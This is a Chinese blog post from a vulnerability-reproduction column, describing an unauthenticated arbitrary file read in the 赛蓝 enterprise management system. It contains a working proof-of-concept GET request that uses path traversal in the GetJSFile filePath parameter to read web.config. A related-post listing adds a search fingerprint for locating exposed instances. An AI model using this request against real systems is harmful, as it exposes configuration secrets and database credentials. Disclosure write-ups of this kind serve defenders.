【漏洞复现】赛蓝企业管理系统GetJSFile存在任意文件读取

于 2024-07-26 11:21:06 发布
阅读量4 收藏
点赞数
分类专栏: 【漏洞复现】 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/140710897
版权
【漏洞复现】 专栏收录该内容
9 篇文章 0 订阅 ¥9.90 ¥99.00
订阅专栏
影响范围

赛蓝企业管理系统

漏洞概述

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平

漏洞复现

应用界面如下所示:

漏洞POC如下所示:

GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1          
Host:           
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36          
Accept: */*          
Accept-Encoding: gzip, deflate, br          
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7          
Connection: close

了解本专栏 订阅专栏 解锁全文
FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
赛蓝企业管理系统 多处 任意文件读取漏洞复现
0xSec
07-09 565
赛蓝企业管理系统 DownloadBuilder 、ReadTxtLog、GetJSFile等多处接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
赛蓝企业管理系统GetJSFile存在任意文件读取漏洞
xiaokp7的博客
07-24 23
赛蓝企业管理系统GetJSFile存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。
漏洞复现赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞
siu~
07-15 376
赛蓝企业管理系统 DownloadBuilder 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
赛蓝企业管理系统DownloadBuilder接口任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
07-11 349
赛蓝企业管理系统DownloadBuilder接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞
xiaokp7的博客
07-24 20
赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。
漏洞复现赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞
qq_39894062的博客
07-09 466
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞
2301_77442655的博客
07-09 332
body="www.cailsoft.com" || body="赛蓝企业管理系统"
赛蓝企业管理系统 GetExcellTemperature SQL注入漏洞复现
0xSec
07-11 747
赛蓝企业管理系统 GetExcellTemperature 接口处SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现赛蓝企业管理系统 GetExcellTemperature SQL注入漏洞
siu~
07-16 174
赛蓝企业管理系统 GetExcellTemperature 接口处SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
蓝桥杯电子赛蓝桥板集成系统(库).zip
04-22
蓝桥杯大赛,全称是蓝桥杯全国软件和信息技术专业人才大赛,是由中华人民共和国工业和信息化部人才交流中心主办,国信蓝桥教育科技(北京)股份有限公司承办的计算机类学科竞赛。这是一个全国高校参加的赛事,累计...
蓝桥杯电子赛蓝桥板集成系统(库)源码+项目说明.zip
01-27
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 3、本资源作为“参考资料”如果需要实现...
赛蓝网页防篡改系统PPT学习教案.pptx
10-06
赛蓝网页防篡改系统PPT学习教案.pptx
Lianwei 安全周报|2024.07.22
联蔚盘云的博客
07-22 760
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
轨道式智能巡检机器人,助力综合管廊安全运维
配电房综合监控
07-25 568
管廊巡检往往处于昏暗、潮湿、幽闭且狭长的空间环境,巡检过程中容易遇到有毒有害气体、泄露的燃气和强电等危险,同时不可避免会对巡检人员的心理构成一定负面影响。)实时性:地下管廊短则几公里、长则数十公里,其内部空间结构复杂,具有设备多、定位难的特点。综合管廊内部环境复杂而恶劣,给水、排水、热力、燃气、电力、电信等管道排布其中,空间狭窄、昏暗、潮湿,甚至会出现有毒害气体泄漏的环境。)环境检测功能:基于各类环境传感器,对于廊体内温湿度、有害气体含量、空气含氧量、烟雾浓度、光照度、井盖等状态进行检测。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 435
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
后台管理系统登录安全和权限要求
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
07-25 560
启用MFA后,系统将要求输入用户名和密码(第一安全要素),再进行输入来自其 MFA设备的动态验证码(第二安全要素),双因子的安全认证将为您的账户提供更高的安全保护。传统的用户名和密码认证容易受到破解、盗取或暴力破解等攻击方式的威胁,而双因子认证可以提供额外的安全层次,确保只有授权用户才能访问账户或系统。通过采用双因子认证,企业可以增加用户账号的安全性,降低身份盗窃和欺诈行为的风险,提高用户对系统的信任度。这在网络安全是极不安全的。订单管理:用于管理订单信息,包括查看订单、修改订单状态、发货、退货、退款等。
气膜建筑的逃生通道设计与安全保障—轻空间
Skansi的博客
07-25 243
确保这类建筑的安全性,尤其是逃生通道的设计,是保障人员生命安全的关键。通过合理设计逃生通道、加强日常维护和应急演练,可以有效提升气膜建筑的安全性,保障人员的生命安全。定期组织应急疏散演练,提高人员逃生意识和技能,确保紧急情况下有序撤离。根据建筑面积和使用人数设计足够的逃生通道,确保人员能够迅速疏散。逃生通道应有清晰的标识和足够的照明,确保在紧急情况下易于找到。材料和结构应具备良好的防火性能,确保通道畅通无阻。逃生通道的宽度和高度应满足疏散需求,避免拥堵。安装应急照明设备和紧急广播系统,引导人员撤离。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值